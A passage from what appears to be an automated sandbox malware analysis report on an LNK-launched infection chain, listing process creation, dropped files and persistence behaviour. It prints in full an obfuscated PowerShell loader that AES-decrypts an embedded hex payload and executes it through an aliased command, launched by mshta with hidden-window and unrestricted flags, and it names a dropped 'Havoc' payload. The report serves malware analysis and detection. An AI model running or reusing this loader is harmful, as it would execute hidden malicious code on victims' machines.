20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14D9E273DBAAF2D5627390C488D4081506BACF9BB631E3BFB99E89402396A70A33B769921D8E13B74BFE560E44E9EA80141571C8144B00F8DFD5B812560521E806858FABDD53F92FF1AF58107B7325097243441EB3D0B85776CB99DBB0477D42CBA9E543DE9D42C27F5C52600E9295D684A3A713292FD7590D5A9D93A1C7A8C449DA6B94034EF5C0876C666B9AF696CB12928616D0C543FDF4FA01CD781A0FD3E27C492347CD5958399225168576CBA1BCF230F43AF6432BD57AE6B38C04EF2A370A6A7A9217AF16A8216F99E4E18DF0865A002FCA560819251C521CBC36B7AF93394D9C3B2BF598BCA8B7E7AF02167AA470C45A1CCE0FCFCAF7F27ABD86382030EE615D8E88E22FE52ED3BE7920C11B0D69789B0869401C0E48DD6B755FE432D03A5A497E5F28EB5E5E44FAFA0C505E6623DFE084696F472CA065C02C263ECEB0AFAD35CE69BFF06ABA1F5B3F0DDA7BA73DD774EB332B541081F516B8571C7AF7673AF3AF66AAB18B80B1E88EE0C7484102BEA4492A97B93C9B25CD23C59C0C19974EE48483A82F0A3DACE4B86F4ACDF9EBD8241CFE51CFACA8304C421249AC1ED97B0130EE35D8024FC019004642A1048544B0EFD18F4AB33955150BB878898726DB416D04B2F38F5D64DC34581D0D970265A7861A50C84E3ED14B3B80F48DC0B376FEF3EC7781DB3ABF08D8CA09272DF1FDFB6A49276F6B84EB85FD08DE40DCECA35D65C7E4C6AF03BD30E2758EA776531B78AC2A0CDB1152B752476FCA117CF49836F1D3F580C7F1EFCC3DF72889A84719CD9CB0906E4426AB5B5ACB90919BB40912D707A2EDBFDF4CA474944334791F9CDE97423D874DEC32D3F51D82D569C9BA9BE15F8C8F45EE5E616DC1ACCF500C07D6397B43D0B7996460B9038754E3BB20065A84C5A0AB1BEA09C08F010390D6CF29034533915FF9B0CDA4E962B0C9526FAEDC4C92583151324317EA1F41668164916EF83A708D49D8D387F3A6FC03B4C45B55CC791633A903C424CC97F360459144E8AAAD18846EDE332AC9D0B0A5DA3942E80D30BC64A79D4F1066CBD427AA9967B032410489BF58E552EABE4E56233E9E617DE26D133799620ABDC2C8A7EE07F161DA0B795BA67A3C330626C5EBCE6DE7CBCBDE927A136CE05FA8D0FA0B1EF5B5F880F8C60B77244C5127D2CF5185955BF12936D162404DCA8452A25052A660077FFA7A581AB5764BFCAFF5EA0E35B323E6B1212E76F58B5497A0D17148E38EB53E7C5672804D7F7F5586A4B9AF992E86A8D5D91729BF16373AB1737376149212ECA57D5C01799429867A591B0FC2F74593A7BBE6DBE58B9B2F9AECE6EEDE50D4794DF2C26135D7C1C53695C710B56DB6E7DC5F0DC736A8F4359B0423D09AE8D87A4BBD3D064D552CFC81D3BD7BF66DAE7DB9F7EBA548845AFEE275E29141FBC37007DC1C4C7D51463745ED37544877624C78476D755254597868556F';function YoR ($pAJaWh){return -split ($pAJaWh -replace '..', '0x$& ')};$YaSAQhF = YoR($ddg.SubString(0, 2048));$xwh = [System.Security.Cryptography.Aes]::Create();$xwh.Key = YoR($ddg.SubString(2048));$xwh.IV = New-Object byte[] 16;$rRodUdSQ = $xwh.CreateDecryptor();$Jpgioi = [System.String]::new($rRodUdSQ.TransformFinalBlock($YaSAQhF, 0,$YaSAQhF.Length)); sal fd $Jpgioi.Substring(3,3); fd $Jpgioi.Substring(6)Jump to behavior
Source: Havoc[1].6.drStatic PE information: 0x9EF0B9FD [Thu Jul 2 03:39:41 2054 UTC]
Source: Havoc[1].6.drStatic PE information: real checksum: 0x1f597 should be: 0x7cff6
Source: Havoc[1].6.drStatic PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345400BD pushad ; iretd 5_2_00007FFD345400C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD33177FEA push ebx; retf 0009h9_2_00007FFD3317801A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD331700BD pushad ; iretd 9_2_00007FFD331700C1

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]Jump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]Jump to dropped file
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
